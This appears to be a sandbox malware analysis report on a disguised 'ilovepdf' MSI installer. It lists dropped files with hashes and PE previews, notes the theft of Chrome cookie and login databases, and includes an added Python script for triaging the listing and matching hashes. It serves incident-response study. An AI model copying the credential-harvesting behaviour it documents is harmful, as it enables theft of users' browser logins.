                                                                                  C:\Program Files (x86)\ilovepdf\unins000.exe (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3038269
                                                                                  Entropy (8bit):6.3798753919324795
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:nLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu/:FwSi0b67zeCzt0+yO3kSs
                                                                                  MD5:F6783D6BAD48D0F022DDB2C0A5819087
                                                                                  SHA1:FD1E4D2EBCC11D98ADAA75797527BA7E8DA5DC59
                                                                                  SHA-256:DAFBDF676A506C8743F4A93E81C927075101A172CBB8B3E8BCCF867D4D270B2B
                                                                                  SHA-512:67C53D7F3A0190E7A9B3FAD2B6E404EF7E0D67536210561B23F98C16C3EA4E4CEFEC8FF475FE318AA5C7466554E349ED5A6E5897576520A490346E7DAF02800A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...p.._.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...P.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                  C:\Program Files (x86)\ilovepdf\update.xml (copy)
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):178
                                                                                  Entropy (8bit):5.200654239805503
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:cFfdXP+FFFKMlFsPR4GXXyWRXlQFSLKbFUuAvF9IZZDKh+sWGXViKWVV9uMv:iV2FFFKMfsp7i22SLKbFUPvYWhpBFiZz
                                                                                  MD5:23872B81B308F0615E32E9EC60B8F806
                                                                                  SHA1:3989CA350F25FA4703573AD07AFBE99DECA43C98
                                                                                  SHA-256:BC528E642062193291745A32FFDF899BF420F556562BF18774B67615DF2A56E2
                                                                                  SHA-512:6357529877B355F724D390117FE19250344B7322098476D30F50D59381956345189E26DCB6618E610F0755C4C9819CAAC5D1323C82F3936FA028D7F3198C3A20
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <config>.. <current Dat="1351852478" />.. <Dat Txt="&#x0A;What&apos;s New: We are waiting for your feedbacks -&gt; ||&#x0A;http://unipdf.com/support/&#x0A;" />..</config>..
                                                                                  C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ilovepdf.lnk
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Oct 24 18:49:17 2021, mtime=Sun Oct 24 18:49:20 2021, atime=Tue Dec 24 17:25:50 2019, length=2613752, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):1092
                                                                                  Entropy (8bit):4.61575992669859
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8moUlzDUAcdOE7YPAzs8/dQqdgUUxDb7X7aB6m:8m3lQBdOrYYWdQqdV2b7mB6
                                                                                  MD5:E861D577008E1B9FEBCE77EF300048EA
                                                                                  SHA1:05FD7622DD8D3D71032EE7C506D34FC71FC9EFAA
                                                                                  SHA-256:1D24C9137FF7F9C6DEB8099F0BD4890FB65F4950FE867DFD29754CB3672AA7F1
                                                                                  SHA-512:8C8E6679A594E6881C45A06BAFE2EB33B7847E095284638BF3BD6D793DA4F0DCC4E5786E21817F6911E5154C1C33EE546955CF13395AC1ACD41A38FC103DBBD8
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: L..................F.... ......:....szn<......e.......'..........................P.O. .:i.....+00.../C:\.....................1.....7Sxy..PROGRA~2.........L.XS......................V.....&*,.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....Z.1.....XS,...ilovepdf..B......XS).XS,.....h.........................i.l.o.v.e.p.d.f.....f.2...'..O9. .ilovepdf.exe..J......XS).XS+...............................i.l.o.v.e.p.d.f...e.x.e.......[...............-.......Z...........C........C:\Program Files (x86)\ilovepdf\ilovepdf.exe..8.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.\.i.l.o.v.e.p.d.f...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.........*................@Z|...K.J.........`.......X.......528110...........!a..%.H.VZAj...R..M..........-..!a..%.H.VZAj...R..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6
                                                                                  C:\Users\Public\Desktop\ilovepdf.lnk
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Oct 24 18:49:17 2021, mtime=Sun Oct 24 18:49:20 2021, atime=Tue Dec 24 17:25:50 2019, length=2613752, window=hide
                                                                                  Category:dropped
                                                                                  Size (bytes):1080
                                                                                  Entropy (8bit):4.614976573469123
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:8moUlzb+dOE7YPAzs8VdQqdgUUxDb7X7aB6m:8m3lb+dOrYYsdQqdV2b7mB6
                                                                                  MD5:4638B21A3E7FB47447EEC7FF96EB791B
                                                                                  SHA1:BB4D6C396116A23EC05C19305FF275C78C59D075
                                                                                  SHA-256:CE219A1BB80D87F8B08F4EAB99D1B5EE74F20A708D29B3AE85E953A460BF1156
                                                                                  SHA-512:5560E3769B53429DFA8F65839F0B26434B75876D74A851B68762E916FB744F3CB77B3EF2F11068C5B22A59B5F763414EA9C2F550BEE2E749AB8CE411C822C151
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: L..................F.... ......:....szn<......e.......'..........................P.O. .:i.....+00.../C:\.....................1.....XS)...PROGRA~2.........L.XS,.....................V.....,...P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....Z.1.....XS,...ilovepdf..B......XS).XS,.....h.........................i.l.o.v.e.p.d.f.....f.2...'..O9. .ilovepdf.exe..J......XS).XS+...............................i.l.o.v.e.p.d.f...e.x.e.......[...............-.......Z...........C........C:\Program Files (x86)\ilovepdf\ilovepdf.exe..2.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.\.i.l.o.v.e.p.d.f...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.i.l.o.v.e.p.d.f.........*................@Z|...K.J.........`.......X.......528110...........!a..%.H.VZAj...R..M..........-..!a..%.H.VZAj...R..M..........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1
                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies.tmp
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):40960
                                                                                  Entropy (8bit):0.792852251086831
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
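The two entries above are the behaviour behind the report's Cookie Stealer verdict: C:\Windows\System32\svchost.exe, a process that has no business in a browser profile, writes SQLite copies of Chrome's Cookies and Login Data stores into User Data\Default and both are marked Malicious:true. For triage, the writer process plus the target path is the durable signal; the MD5/SHA1/SHA-256 values of those two .tmp files are hashes of a copy of this sandbox's own browser databases and will not recur on a real victim, whereas the hashes of the installer-chain files (MSIFBC3.tmp, the is-*.tmp payloads) are reusable indicators. Note also that the cached C:\Windows\Installer\3cf0a5.msi carries the same MD5/SHA1/SHA-256 as the submitted sample, so it is the same artifact, not a second one. The script below is an added example, not part of the Joe Sandbox report: it parses records in the "path line followed by Key:Value lines" shape used by this listing, flags records by verdict and by system-binary-writes-browser-store, and builds a hash index for matching files collected elsewhere. The record layout is assumed from the page; the embedded SAMPLE is constructed from three of the listing's own entries with the Preview lines omitted.

```python
"""Triage a Joe Sandbox-style dropped-file listing (added example, not report code).

Assumed layout (taken from the page): a record starts with a drive path line
("C:\\...") and is followed by "Key:Value" lines until the next path line.
"""
import hashlib
import re
from dataclasses import dataclass, field

# Metadata keys that appear in the listing; anything else is ignored.
KEYS = ("Process", "File Type", "Category", "Size (bytes)", "Entropy (8bit)",
        "Encrypted", "SSDEEP", "MD5", "SHA1", "SHA-256", "SHA-512",
        "Malicious", "Reputation", "Preview")

# Constructed sample: three records copied from the report's listing.
SAMPLE = """\
C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.tmp
Process:C:\\Windows\\System32\\svchost.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):20480
MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
Malicious:true
C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.tmp
Process:C:\\Windows\\System32\\svchost.exe
File Type:SQLite 3.x database, last written using SQLite version 3032001
Category:dropped
Size (bytes):40960
MD5:81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
Malicious:true
C:\\Users\\user\\AppData\\Local\\Temp\\is-ATKLL.tmp\\_isetup\\_isdecmp.dll
Process:C:\\Users\\user\\AppData\\Local\\Temp\\is-OOL1B.tmp\\MSIFBC3.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):35616
MD5:C6AE924AD02500284F7E4EFA11FA7CFC
SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
Malicious:false
"""

DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")          # a new record begins here
SYSTEM_WRITERS = ("\\windows\\system32\\svchost.exe",)   # assumed watch-list
BROWSER_STORES = ("\\google\\chrome\\user data\\",)      # assumed watch-list


@dataclass
class Dropped:
    path: str
    meta: dict = field(default_factory=dict)


def parse_listing(text):
    """Split the listing into Dropped records keyed by the page's own field names."""
    records = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if DRIVE_PATH.match(line):
            records.append(Dropped(line))
            continue
        key, sep, value = line.partition(":")
        if sep and key in KEYS and records:
            records[-1].meta[key] = value.strip()
    return records


def suspicious(rec):
    """Reasons a record deserves attention; empty list means nothing flagged."""
    reasons = []
    proc = rec.meta.get("Process", "").lower()
    path = rec.path.lower()
    if rec.meta.get("Malicious", "").lower() == "true":
        reasons.append("sandbox verdict Malicious:true")
    if any(s in path for s in BROWSER_STORES) and any(proc.endswith(w) for w in SYSTEM_WRITERS):
        reasons.append("system binary writing into a browser profile store")
    return reasons


def triage(records):
    """(path, reasons) for every flagged record, in listing order."""
    return [(r.path, suspicious(r)) for r in records if suspicious(r)]


def ioc_index(records):
    """Map (algorithm, lowercase hex digest) -> dropped path for hash matching."""
    idx = {}
    for r in records:
        for key, algo in (("MD5", "md5"), ("SHA1", "sha1"), ("SHA-256", "sha256")):
            digest = r.meta.get(key)
            if digest:
                idx[(algo, digest.lower())] = r.path
    return idx


def match_bytes(data, idx):
    """Return the listed path whose hash matches data, or None."""
    for algo in ("md5", "sha1", "sha256"):
        hit = idx.get((algo, hashlib.new(algo, data).hexdigest()))
        if hit:
            return hit
    return None


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for path, why in triage(recs):
        print(path, "->", "; ".join(why))
```

Run against the full listing, the index lets a responder hash files pulled from a suspect host and tie them back to the installer chain; the Chrome .tmp records still surface via their verdict and writer-process rule even though their hashes will never match anything off this sandbox.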
                                                                                  C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_isdecmp.dll
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):35616
                                                                                  Entropy (8bit):6.953519176025623
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmp
                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):6144
                                                                                  Entropy (8bit):4.720366600008286
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmp
                                                                                  Process:C:\Windows\Installer\MSIFBC3.tmp
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):3014144
                                                                                  Entropy (8bit):6.393836278460701
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:fLJwSihjOb6GLb4SKEs3DyOMC2DlUt0+yO3A32ASNTvu:dwSi0b67zeCzt0+yO3kS
                                                                                  MD5:D73DDB8F6B777CC6411FD3CA254F3DEC
                                                                                  SHA1:695B2510981FFFCD62B9C0A6C86FED48A2C7F909
                                                                                  SHA-256:36BAFE4EDE8149A84EA4DA3F63B7982E7ACF849266418D8D6D1072FE244D32D6
                                                                                  SHA-512:2769A64798BC5285945F0608EC254B03808AD767A1830167A5DF5E7A963F5929C184694A54030C3B7EF4DFBD776412C85C8CBB1E6567D49D08A1F8B18CF7D418
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...p.._.................$,.........P6,......@,...@.......................................@......@....................-......`-.49....-.......................................................-......................i-.......-......................text...P.+.......+................. ..`.itext..t(....,..*....+............. ..`.data.......@,......(,.............@....bss.....x....,..........................idata..49...`-..:....,.............@....didata.......-.......,.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@......................-.............@..@........................................................
                                                                                  C:\Windows\Installer\3cf0a5.msi
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Last Printed: Fri Sep 18 11:48:09 2009, Create Time/Date: Fri Sep 18 11:48:09 2009, Name of Creating Application: Windows Installer, Title: exe2msiSetupPackage, Author: QwertyLab, Template: Intel;1033, Last Saved By: dmitry, Revision Number: {CDFF8FBF-8895-4382-936D-A20B4780ACE1}, Last Saved Time/Date: Fri Sep 18 14:10:05 2009, Number of Pages: 200, Number of Words: 2, Security: 1
                                                                                  Category:dropped
                                                                                  Size (bytes):7306752
                                                                                  Entropy (8bit):7.9317963528183935
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:8GTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY:8GmcTpRGZ3jtn1IShcc8YY
                                                                                  MD5:623673851FBB205EB0D1003CB892D4D6
                                                                                  SHA1:C541B4E10541BB0A6565BA8CC6B64D2480EF4437
                                                                                  SHA-256:71A98E982A9DDE0FFCF9A46554B7ABAF947AC4C33F3A3B35DF1A58B0064D0704
                                                                                  SHA-512:AE40BB582937B32C25E0A465CAC75106B04F6E0880CBF0E920F9C0DD80D7DD3E71A9C62BA8607375D7200675D4B4F18571745E00BD920418A662955E4BE23669
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ......................>...................p...............A...................f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...{...|...}...~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...........C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q.......S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e.......................................................................................
                                                                                  C:\Windows\Installer\MSIF681.tmp
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):7196926
                                                                                  Entropy (8bit):7.948610318777266
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:yTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY7:ymcTpRGZ3jtn1IShcc8YY7
                                                                                  MD5:24AFC545F42F59E3DB3B3FDA53371BEA
                                                                                  SHA1:B513ED9B64F1A95A631C483F8E08CAB612032764
                                                                                  SHA-256:EACA6FAFF890AA51B563F71E6EA9FAFD4130999234B757AE476B5E87757B7B38
                                                                                  SHA-512:8FABC38AA23E90D3A3CC41D992658C90D6FA4646CA7FA3F76D495C4D8F689C47DFFFF0571F7227032DE3E2191D4985C30E78E04F36BA743206E0C320CA8C5C41
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ...@IXOS.@.....@#fXS.@.....@.....@.....@.....@.....@......&.{D0D5A8D4-2C54-41FD-A0C3-50CC56973D60}..exe2msiSetupPackage..6rfyiAq0nM.msi.@.....@.....@.....@........&.{CDFF8FBF-8895-4382-936D-A20B4780ACE1}.....@.....@.....@.....@.......@.....@.....@.......@......exe2msiSetupPackage......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration.....@.....@.....@.]....&.{4C231858-2B39-11D3-8E0D-00C04F6837D0}...@.......@.....@.....@........RemoveODBC..Removing ODBC components..T....@....T....@......%._B3D13F97_1369_417D_A477_B4C42B829328....J.%._B3D13F97_1369_417D_A477_B4C42B829328.@......4.m.MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...n.._.................P...........^.......p
                                                                                  C:\Windows\Installer\MSIFBC3.tmp
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):7196212
                                                                                  Entropy (8bit):7.948679787500133
                                                                                  Encrypted:false
                                                                                  SSDEEP:196608:0TKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YYE:0mcTpRGZ3jtn1IShcc8YYE
                                                                                  MD5:B6D7559D31D4FF2D02338DF9CEF2FBD8
                                                                                  SHA1:A46994CDACAD1C1C3C00E09F8DF12C9D6F8BC8AA
                                                                                  SHA-256:33ABF84C329A9C9691A7900059B2106CDD491976F0D5CCCC9CE493F4B7A4670C
                                                                                  SHA-512:6BD3A568588E61E04ED46D4EB67F85BA31ABC6B0FAD382F73A3C738C3A54543DB7E830ABFB1D1AFA8953D603966AE3E8E3AEEF324F58073E5363F7DCE8D844E2
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):122558
                                                                                  Entropy (8bit):5.363511311327374
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:iHzMV+f84vcIH17Yyxkjr0+NVRVle+yjeLWJOQzi7gZFOIKICh/81r8yQ1oXB4Hi:iHHJCoX5Ci
                                                                                  MD5:4C07CE11405369C87C0F2F0529DD1EDE
                                                                                  SHA1:42AC1D94AE42C4D575C1FC4F2C6A3D52933B004A
                                                                                  SHA-256:1FAAD6F0611922BAD2D21D65BA30CF396EFD76182BF56257AD27100405F8931D
                                                                                  SHA-512:222830B18EECB719372D3295E5A071BD44CB3CDC72780BF79904A4EEC5939B50A7FE42477D08C24A122C5C3F257C5A5113139D3A2A359A4DEE842E282B9A4D4A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: .To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..07/23/2020 10:13:25.847 [3928]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.Hosting, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.863 [3928]: ngen returning 0x00000000..07/23/2020 10:13:25.925 [1900]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.VisualStudio.Tools.Applications.ServerDocument, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /NoDependencies ..07/23/2020 10:13:25.925 [1900]: ngen returning 0x00000000..07/23/2020 10:13:25.972 [4436]: Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe install Microsoft.Office.Tools.v4.0.Framework, Version=10.0.0.00000, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A /queue:3 /N

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Last Printed: Fri Sep 18 11:48:09 2009, Create Time/Date: Fri Sep 18 11:48:09 2009, Name of Creating Application: Windows Installer, Title: exe2msiSetupPackage, Author: QwertyLab, Template: Intel;1033, Last Saved By: dmitry, Revision Number: {CDFF8FBF-8895-4382-936D-A20B4780ACE1}, Last Saved Time/Date: Fri Sep 18 14:10:05 2009, Number of Pages: 200, Number of Words: 2, Security: 1
                                                                                  Entropy (8bit):7.9317963528183935
                                                                                  TrID:
                                                                                  • Microsoft Windows Installer (77509/1) 90.59%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 9.36%
                                                                                  • Corel Photo Paint (41/41) 0.05%
                                                                                  File name:6rfyiAq0nM.msi
                                                                                  File size:7306752
                                                                                  MD5:623673851fbb205eb0d1003cb892d4d6
                                                                                  SHA1:c541b4e10541bb0a6565ba8cc6b64d2480ef4437
                                                                                  SHA256:71a98e982a9dde0ffcf9a46554b7abaf947ac4c33f3a3b35df1a58b0064d0704
                                                                                  SHA512:ae40bb582937b32c25e0a465cac75106b04f6e0880cbf0e920f9c0dd80d7dd3e71a9c62ba8607375d7200675d4b4f18571745e00bd920418a662955e4be23669
                                                                                  SSDEEP:196608:8GTKBLeU6tpYgnZhKMBSZXnjfxLn1MUAJShcHgJ6M8YY:8GmcTpRGZ3jtn1IShcc8YY

                                                                                  File Icon

                                                                                  Icon Hash:a2a0b496b2caca72

                                                                                  Static OLE Info

                                                                                  General

                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1

                                                                                  OLE File "6rfyiAq0nM.msi"

                                                                                  Indicators

                                                                                  Has Summary Info:True
                                                                                  Application Name:Windows Installer
                                                                                  Encrypted Document:True
                                                                                  Contains Word Document Stream:False
                                                                                  Contains Workbook/Book Stream:False
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:
                                                                                  Flash Objects Count:
                                                                                  Contains VBA Macros:False

                                                                                  Summary

                                                                                  Code Page:1252
                                                                                  Title:exe2msiSetupPackage
                                                                                  Subject:
                                                                                  Author:QwertyLab
                                                                                  Keywords:
                                                                                  Comments:
                                                                                  Template:Intel;1033
                                                                                  Last Saved By:dmitry
                                                                                  Revision Number:{CDFF8FBF-8895-4382-936D-A20B4780ACE1}
                                                                                  Last Printed:2009-09-18 10:48:09.509000
                                                                                  Create Time:2009-09-18 10:48:09.509000
                                                                                  Last Saved Time:2009-09-18 13:10:05.783000
                                                                                  Number of Pages:200
                                                                                  Number of Words:2
                                                                                  Creating Application:Windows Installer
                                                                                  Security:1

                                                                                  Streams

                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 448
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  File Type:data
                                                                                  Stream Size:448
                                                                                  Entropy:3.98974006197
                                                                                  Base64 Encoded:True
                                                                                  Stream Path: \x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670, File Type: PE32 executable (GUI) Intel 80386, for MS Windows, Stream Size: 7196212
                                                                                  General
                                                                                  Stream Path:\x17163\x16689\x18229\x18430\x14797\x14413\x14465\x14351\x14916\x14987\x14977\x14662\x15045\x15173\x14985\x15169\x14784\x14464\x15245\x14670
